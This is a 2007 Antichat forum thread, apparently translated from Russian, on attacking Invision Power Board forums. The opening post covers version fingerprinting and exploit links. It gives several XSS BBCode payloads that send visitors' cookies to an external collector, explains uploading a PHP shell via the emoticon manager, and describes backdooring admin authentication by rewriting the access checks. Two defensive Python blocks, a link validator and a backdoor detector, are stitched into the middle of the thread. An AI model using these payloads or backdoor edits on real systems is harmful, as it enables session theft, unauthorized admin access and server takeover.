IPB Vulnerabilities Review

Discussion in 'Forum for discussion of ANTICHAT' started by bx_N, 9 Mar 2007.

  1. bx_N

    How to determine the forum version

    Invision Power Board 1.3
    If these folders exist:
    /html/emoticons/
    /fonts/
    /Skin/
    /ssi_templates/
    and these files:
    ssi.php
    show.php
    css.php
    conf_mime_types.php

    Invision Power Board 2.0.*
    If these files exist:
    /sources/help.php
    /sources/usercp.php
    /sources/trial_functions.php
    /sources/topics.php
    /sources/taskloader.php
    and requesting a folder such as /ips_kernel/ returns a 403 "access forbidden" page reading "403: Invision Power Board -> Forbidden".

    Invision Power Board 2.1.*
    If this folder exists:
    /ips_kernel/PEAR/
    and this file:
    info.php
    and requesting a folder such as /ips_kernel/ returns a 403 "access forbidden" page reading "403: Invision Power Board -> Forbidden".
    Exploits
    Version Invision Power Board 1.3.1 _http://milw0rm.com/id.php?id=1036
    Version Invision Power Board 1.* , 2.* (<2.0.4) _http://rst.void.ru/download/r57ipb2.txt
    Version Invision Power Board 2.0.0 - 2.0.2 _http://milw0rm.com/id.php?id=648
    Version Invision Power Board Army System Mod 2.1 _http://www.milw0rm.com/exploits/1492
    Version Invision Power Board 2.1.4 (DoS) _http://www.milw0rm.com/id.php?id=1489
    Version Invision Power Board <=2.1.5 (Remote code execution)
    http://forum.antichat.ru/thread18222.html
    XSS
    The "*" sign is not part of these codes; it is inserted so that the codes won't work on this forum.
    Code:
    [ema*il]wj@wj[u*rl=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Code:
    [HT*ML][EMA*IL][UR*L=wj`=`][/U*RL][/EM*AIL][/co*lor][color=wh*ite]` style=`backg*round:url(javascript:docu*ment.images   [1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`[/c*olor]
    Code:
    [EMA*IL][email protected][U*RL=target/*style=background:url(javasc*ript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/U*RL][/EM*AIL]
    Code:
    [po*st=1000[to*pic=target style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie); ][/to*pic]][/po*st]
    Code:
    [em*ail][email protected][/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
    Code:
    [COLOR=[IМG]http://aaa.aa/=`aaa.jpg[/IMG]]` style=background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)
    Code:
    [EM*AIL][U*RL=wj`=`][/UR*L][/EM*AIL]]` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie)`
    Uploading a shell
    Invision Power Board 1.3
    Administration -> Manage Emoticons -> Upload an Emoticon to the emoticons directory
    Usually the shell is uploaded to one of these folders, depending on the version, if your access is sufficient:
    1.3 /forum/html/emoticons/shell.php
    2.* /forum/style_emoticons/default/shell.php
    where shell.php is the name of your uploaded shell.
    Trojaning the forum

    Invision Power Board 1.3
    PHP:
    if ($GROUP['g_access_cp'] != 1)
    {
        do_login("You do not have access to the administrative CP");
    }
    else
    {
        $session_validated = 1;
        $this_session      = $row;
    }
    and change to
    PHP:
    if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1)
    {
        $session_validated = 1;
        $this_session      = $row;
    }
    and search for these lines (line 442 by default)
    PHP:
    if ($GROUP['g_access_cp'] != 1)
    {
        do_login("You do not have access to the administrative CP");
    }
    else
    {

        //----------------------------------
        // All is good, rejoice as we set a
        // session for this user
        //----------------------------------

        $sess_id = md5( uniqid( microtime() ) );
    and change to
    PHP:
    if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1)
    {

        //----------------------------------
        // All is good, rejoice as we set a
        // session for this user
        //----------------------------------

        $sess_id = md5( uniqid( microtime() ) );
    then we edit the file /sources/Admin/ad_mysql.php and delete these lines
    PHP:
    if ($MEMBER['mgroup'] != $INFO['admin_group'])
    {
    $ADMIN->error("Sorry, these functions are for the root admin group only");
    }
    Invision Power Board 2.0.*
    /sources/action_admin/login.php
    line 147 by default
    delete these lines
    PHP:
    if ($mem['g_access_cp'] != 1)
    {
    $this->login_form("You do not have access to the administrative CP");
    }
    else
    {
    and on line 206 (by default) delete the character "}" (naturally, without the quotation marks).
    sql.php, line 46 by default:
    we delete
    PHP:
    if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
    {
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
    }
    then we go to
    /sources/lib/admin_functions.php (line 262)
    and change the line:
    PHP:
    $this->ipsclass->admin_session['_session_validated'] = 0;
    change to
    PHP:
    $this->ipsclass->admin_session['_session_validated'] = 1;
    then we delete these lines in the file /sources/sql_mysql.php (line 76 by default)
    PHP:
    if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
    {
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
    }
    Now we'll explain all this in detail. When you log in to the admin CP (without "trojaning"), the check
    if ($GROUP['g_access_cp'] != 1)
    {
        do_login("You do not have access to the administrative CP");
    }
    verifies whether you have access to the admin CP. To obtain access it is necessary to change the line if ($GROUP['g_access_cp'] != 1) to if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1 ).
    --------------------
    Thanks qBiN

    Original version here: http://forum.antichat.ru/thread11615.html
    by k1b0rg

    [edit: some mistakes were corrected (too tired to look more), real copyrights added]
    #1 bx_N, 9 Mar 2007
    Last edited by a moderator: 9 Mar 2007
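A hardened form of [url]/[email] parameter handling against the attribute breakout that the XSS codes above rely on (a backtick or quote closing the attribute, then a style= with a javascript: URL). This is an added example, not IPB's parser or code from the thread; the validation rules and the constructed test inputs are assumptions.

```python
import html
import re

# Allow only http(s)/mailto targets made of URL-safe characters; quotes, backticks,
# whitespace and a javascript: scheme cannot get through this pattern.
SAFE_URL = re.compile(r"^(?:https?://|mailto:)[A-Za-z0-9._~/?#@!$&()*+,;=%-]+$")
# Plain local@domain address for [email]; anything else is refused.
SAFE_EMAIL = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

def safe_link_param(value):
    """True if value may be used as an href target."""
    return bool(SAFE_URL.match(value))

def safe_email(value):
    """True if value is a plain e-mail address."""
    return bool(SAFE_EMAIL.match(value))

def render_url(param, text):
    """Render [url=param]text[/url]; an invalid target is shown as escaped plain text."""
    if not safe_link_param(param):
        return html.escape(f"[url={param}]{text}[/url]")
    return f'<a href="{html.escape(param)}">{html.escape(text)}</a>'

def render_email(param, text):
    """Render [email=param]text[/email] the same way."""
    if not safe_email(param):
        return html.escape(f"[email={param}]{text}[/email]")
    return f'<a href="mailto:{html.escape(param)}">{html.escape(text)}</a>'

# Constructed inputs modelled on the breakout pattern of the post's codes
# (asterisks removed, the cookie-collecting URL replaced by a placeholder host).
BREAKOUTS = [
    "wj`=`",
    "target/*style=background:url(javascript:document.images[1].src=\"http://x.invalid/?\"+document.cookie); ",
    "http://aaa.aa/=`aaa.jpg",
]

def all_refused(params):
    """True when none of the given parameters passes validation."""
    return not any(safe_link_param(p) for p in params)
```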
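A detection check for the admin-CP backdoor edits and the emoticon-directory shell upload described in the post above, written as an added example (not IPB's code and not from the original thread). The PHP snippets are constructed stand-ins for the named files, and the regex heuristics and file lists are assumptions drawn from the post.

```python
import os
import re

# Constructed stand-ins for the IPB admin files named in the post (not IPB's code):
# a clean CP-access guard, its trojaned variant, and a clean root-admin guard.
CLEAN_LOGIN = """if ($GROUP['g_access_cp'] != 1)
{
    do_login("You do not have access to the administrative CP");
}"""
TROJANED_LOGIN = """if ($GROUP['g_access_cp'] != 1 || $GROUP['g_access_cp'] == 1)
{
    $session_validated = 1;
}"""
CLEAN_SQL = """if ($this->ipsclass->member['mgroup'] != $this->ipsclass->vars['admin_group'])
{
    $this->ipsclass->admin->error("Sorry, these functions are for the root admin group only");
}"""

# File names taken from the post; matched by basename (assumed layout).
LOGIN_FILES = {"login.php"}
SQL_FILES = {"ad_mysql.php", "sql.php", "sql_mysql.php"}
EMOTICON_DIRS = ("html/emoticons/", "style_emoticons/")

# Heuristics for the edits the post describes.
TAUTOLOGY = re.compile(r"g_access_cp'\]\s*!=\s*1\s*\|\|\s*\$\w+\['g_access_cp'\]\s*==\s*1")
FORCED_SESSION = re.compile(r"_session_validated'\]\s*=\s*1\s*;")
ACCESS_GUARD = re.compile(r"g_access_cp'\]\s*!=\s*1\s*\)")
ROOT_GUARD = re.compile(r"root admin group only")

def audit_admin_source(path, source):
    """Return findings for one admin-side PHP file (empty list means nothing flagged)."""
    name = os.path.basename(path)
    findings = []
    if TAUTOLOGY.search(source):
        findings.append("CP access check rewritten as a tautology (always true)")
    if FORCED_SESSION.search(source):
        findings.append("admin session forced to validated")
    if name in LOGIN_FILES and not ACCESS_GUARD.search(source):
        findings.append("g_access_cp guard missing")
    if name in SQL_FILES and not ROOT_GUARD.search(source):
        findings.append("root admin group check missing")
    return [f"{path}: {f}" for f in findings]

def php_in_emoticon_dirs(paths):
    """Return every .php path under an emoticon directory, where the post uploads shells."""
    return [p for p in paths
            if p.lower().endswith(".php")
            and any(d in p.replace("\\", "/") for d in EMOTICON_DIRS)]
```

Run the audit over the real files of an installation by reading each one and passing its path and contents to audit_admin_source, and feed a directory walk into php_in_emoticon_dirs.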
  2. NeMiNeM

    Did you use a translator? Plenty of mistakes...

    When I come back home, I'll correct your post. Check your translation next time please.
     
  3. bx_N

    No, only a dictionary.
     
  4. k1b0rg

    Don't you think you've stolen my article?
    http://forum.antichat.ru/thread11615.html
     
    #4 k1b0rg, 9 Mar 2007
    Last edited by a moderator: 9 Mar 2007